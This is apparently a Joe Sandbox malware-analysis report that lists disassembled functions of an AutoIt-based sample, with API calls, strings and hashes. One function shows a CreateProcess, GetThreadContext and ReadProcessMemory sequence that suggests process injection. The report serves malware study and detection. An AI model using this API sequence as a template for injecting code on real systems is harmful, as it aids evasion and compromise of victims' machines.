Part of subcall function 00AC074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AA72C5), ref: 00AC0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00ADECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00ADED32
RegCloseKey.ADVAPI32(?), ref: 00ADED70
_wcscat.LIBCMT ref: 00ADEDC9

Strings

\, xrefs: 00ADEDEC
Software\AutoIt v3\AutoIt, xrefs: 00AA72FE
Include, xrefs: 00ADECE8, 00ADED29
\Include\, xrefs: 00AA72C5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 54065347a93a055b5823a42abae5390bbaee4cd9df5ad21a04a7ee136d598c00
Instruction ID: a63541c55b083e746aca4fff1e80d3273cc8c7dfedbc6ac4cd3998aaa9177a08
Opcode Fuzzy Hash: 54065347a93a055b5823a42abae5390bbaee4cd9df5ad21a04a7ee136d598c00
Instruction Fuzzy Hash: 4A715A715483019EC714EF25ED959AFBBF8FF9A744B40052EF446872A0EFB09948CBA1

Function 00AA3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3A62
LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A71
LoadIconW.USER32(00000063), ref: 00AA3A88
LoadIconW.USER32(000000A4), ref: 00AA3A9A
LoadIconW.USER32(000000A2), ref: 00AA3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AD2
RegisterClassExW.USER32(?), ref: 00AA3B28

Part of subcall function 00AA3041: GetSysColorBrush.USER32(0000000F), ref: 00AA3074
Part of subcall function 00AA3041: RegisterClassExW.USER32(00000030), ref: 00AA309E
Part of subcall function 00AA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
Part of subcall function 00AA3041: InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
Part of subcall function 00AA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
Part of subcall function 00AA3041: LoadIconW.USER32(000000A9), ref: 00AA30F2
Part of subcall function 00AA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

#, xrefs: 00AA3B0D
0, xrefs: 00AA3B06
AutoIt v3, xrefs: 00AA3B17

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3580d9e3b3ebbc5985283c2ed00a134e6b7496736fd1398fde74e8ff866a475e
Instruction ID: 599b37a64b05f04381c20cc7039c5d0f573291bd6fc550af14e1bf3249a02cb4
Opcode Fuzzy Hash: 3580d9e3b3ebbc5985283c2ed00a134e6b7496736fd1398fde74e8ff866a475e
Instruction Fuzzy Hash: EB210871940305ABEB149FA4ED19BAD7FB4EB08711F00412AF504A72E0DBBA5A548F94

Function 00AA3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00AA36D2
KillTimer.USER32(?,00000001), ref: 00AA36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA372A
CreatePopupMenu.USER32 ref: 00AA373E
PostQuitMessage.USER32(00000000), ref: 00AA375F

Strings

TaskbarCreated, xrefs: 00AA3725

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 5021a2812d3435ecfcfaf02742beac7fdeee13b2b4cf5589d70b8d0cbbc79919
Instruction ID: 582e17d308ac7b64122e3ca66aa4b6abfa5f7f936b4b5b9c0c4947f685d95ee7
Opcode Fuzzy Hash: 5021a2812d3435ecfcfaf02742beac7fdeee13b2b4cf5589d70b8d0cbbc79919
Instruction Fuzzy Hash: 1341C9B32041057BDF259F78DD49B7A37A9EB06300F14022AF602972F1DFA89D5597A1

Function 00AA3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00AA37C0
CMDLINERAW, xrefs: 00AA380D
/AutoIt3ExecuteScript, xrefs: 00AA38CE
/AutoIt3OutputDebug, xrefs: 00AA38A4
/ErrorStdOut, xrefs: 00AA388F
/AutoIt3ExecuteLine, xrefs: 00AA38B9
CMDLINE, xrefs: 00AA3834

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 9f3c3fc106ba70591047644d65dc2de854ac7949dfa3bd620b85840b3bc85a53
Instruction ID: abe5db30f030406a2c8a0a0a8c40bfcfae6bd9938d28bdd16681989188865b4e
Opcode Fuzzy Hash: 9f3c3fc106ba70591047644d65dc2de854ac7949dfa3bd620b85840b3bc85a53
Instruction Fuzzy Hash: 42A15372D10229AACF14EFA0DD95EEEB7B8BF16300F14052AF416671D1EF749A05CB60

Function 00A425F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A426C1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A428E7

Memory Dump Source

Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: 1d9a23eb879d3c95e4e58a3c0c699bcc4f837b9108b58169ea66371a77bc5b2f
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 07A11878E00209EBDB14CFA4C994BEEBBB5FF88304F608559E501BB280D7759A41DFA4

Function 00AA39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A36
ShowWindow.USER32(00000000,?,?), ref: 00AA3A4A
ShowWindow.USER32(00000000,?,?), ref: 00AA3A53

Strings

edit, xrefs: 00AA3A30
AutoIt v3, xrefs: 00AA3A0D, 00AA3A12, 00AA3A13

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 38a2779fc9facf811222d8a466055cddd943bbdb829f74f75e51f9ab5fb4c9a7
Instruction ID: ba2acb8a6f4d5a414125cba327d8a091c992b819d6fa637533be6a01fa7c93a4
Opcode Fuzzy Hash: 38a2779fc9facf811222d8a466055cddd943bbdb829f74f75e51f9ab5fb4c9a7
Instruction Fuzzy Hash: 61F0DA716412907EEB311B276C59E772F7DD7C6F50B00413AF904E31B0CAE91851DAB0

Function 00A423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A422A0: Sleep.KERNELBASE(000001F4), ref: 00A422B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A424DF

Strings

VAYJBYJVLNAMY1E, xrefs: 00A42542, 00A42545

Memory Dump Source

Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateFileSleep
String ID: VAYJBYJVLNAMY1E
API String ID: 2694422964-4178516806
Opcode ID: fd0f24fe7ef676856aba473c2ad4fc0d82a15cb00b1cf0a5a8e00028a04edd42
Instruction ID: f9248abc61f2a5327be925570240d291fada86a1be6f942ec28b1e1a421055b4
Opcode Fuzzy Hash: fd0f24fe7ef676856aba473c2ad4fc0d82a15cb00b1cf0a5a8e00028a04edd42
Instruction Fuzzy Hash: 9B519174D14249EBEF10DBE4C855BEEBB79AF58300F004199E608BB2C1D7B91B44CB66

Function 00AA410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00ADD5EC

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

_memset.LIBCMT ref: 00AA418D
_wcscpy.LIBCMT ref: 00AA41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA41F1

Strings

Line: , xrefs: 00ADD615

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: ecbe7da5e25fabc3100dae728d6a603dc8afdbe05b06c7873db5d3cbe8719b5d
Instruction ID: 5065e8b588dd7e17318b7f52e50d0953f49fcf2dac99d43dd6365ba8dd4b6fed
Opcode Fuzzy Hash: ecbe7da5e25fabc3100dae728d6a603dc8afdbe05b06c7873db5d3cbe8719b5d
Instruction Fuzzy Hash: 3931B171408314AAD761EB60DD56FEF77E8AF86300F10461EF185931E1EFB4AA49CB92

Function 00AC564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00AC56AB
_memcpy_s.LIBCMT ref: 00AC571D
__read_nolock.LIBCMT ref: 00AC577B
__filbuf.LIBCMT ref: 00AC579E
_memset.LIBCMT ref: 00AC57E2

Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 1caf93493896d42506fef4f31b7d277f9b6f3a8a744a3222f08f3f4eb85f24bf
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: C7517F34E00B05DBDB249FB98984F6E77B5AF50320F6A8B2DF825962D0D770ADD08B40

Function 00AA69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00AA4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4F6F

_free.LIBCMT ref: 00ADE68C
_free.LIBCMT ref: 00ADE6D3

Part of subcall function 00AA6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6D0D

Strings

Bad directive syntax error, xrefs: 00ADE6BB
>>>AUTOIT SCRIPT<<<, xrefs: 00ADE462

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 7408b06788bccd304c3f702a51e4e359c73bfc03e3d3a646852518374bb01bd0
Instruction ID: a7cc3429a46866c9b02f239629199c5e11f98cc6e69b34ed0f5a39d4142ccd70
Opcode Fuzzy Hash: 7408b06788bccd304c3f702a51e4e359c73bfc03e3d3a646852518374bb01bd0
Instruction Fuzzy Hash: 88915F71910219AFCF04EFA4CD919EDB7B4FF19314F14446AF816AB2A1EB31A905CB50

Function 00AA35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AA35A1,SwapMouseButtons,00000004,?), ref: 00AA35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA35F5
RegCloseKey.KERNELBASE(00000000,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA3617

Strings

Control Panel\Mouse, xrefs: 00AA35D2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
Instruction ID: f7bc62d99f9b1764b556e32e79f1748c06495f3f2d769e66a2a633546fbcc676
Opcode Fuzzy Hash: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
Instruction Fuzzy Hash: 00113672910208BADF208FA4D840DABB7B8EF05740F00846AB805D7250E7719E419B60

Function 00A412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A41ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A41AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A41B13
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00A41E1C

Memory Dump Source

Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
Instruction ID: 8498f239f9259bdaa24ff07c18355bba004c94096e63d449bc51c86e9435871d
Opcode Fuzzy Hash: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
Instruction Fuzzy Hash: FD621C74A14258DBEB24CFA4C851BEEB372EF98300F1091A9D10DEB394E7759E81CB59

Function 00B097E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00AA5045: _fseek.LIBCMT ref: 00AA505D

Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AAE
Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AC1

_free.LIBCMT ref: 00B0992C
_free.LIBCMT ref: 00B09933
_free.LIBCMT ref: 00B0999E

Part of subcall function 00AC2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C64), ref: 00AC2FA9
Part of subcall function 00AC2F95: GetLastError.KERNEL32(00000000,?,00AC9C64), ref: 00AC2FBB

_free.LIBCMT ref: 00B099A6

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: a640e2d2e032e3d5527e32c8a99eb04558b164f19fd22f082e4b73fe4644b56e
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: D5514DB1D04218AFDF249F64DC81B9EBBB9EF48310F1044AEB649A7281DB715E90CF59

Function 00AC493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AC49D0
__flush.LIBCMT ref: 00AC49F0
__write.LIBCMT ref: 00AC4A23
__flsbuf.LIBCMT ref: 00AC4A51

Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 58a74fe7340d1783ddabf315d15587e4d65b63ad440ce5deeb4f279d2be6efeb
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 2B41C574A006159BDF28CF69C8A0FAF77B5EF883A0B26813DE85587640D770DD40874C

Function 00AA73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ADEE62
GetOpenFileNameW.COMDLG32(?), ref: 00ADEEAC

Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE

Part of subcall function 00AC09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC09F4

Strings

X, xrefs: 00ADEE7A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 4ba97a852c10cc1d72664f7b0623e16ce24003c929f44f8a23f7656d10e3e8c4
Instruction ID: 759219e6a480fac71b5420eb9f000b692975511428ebcfaf3cd773a6e5cd166d
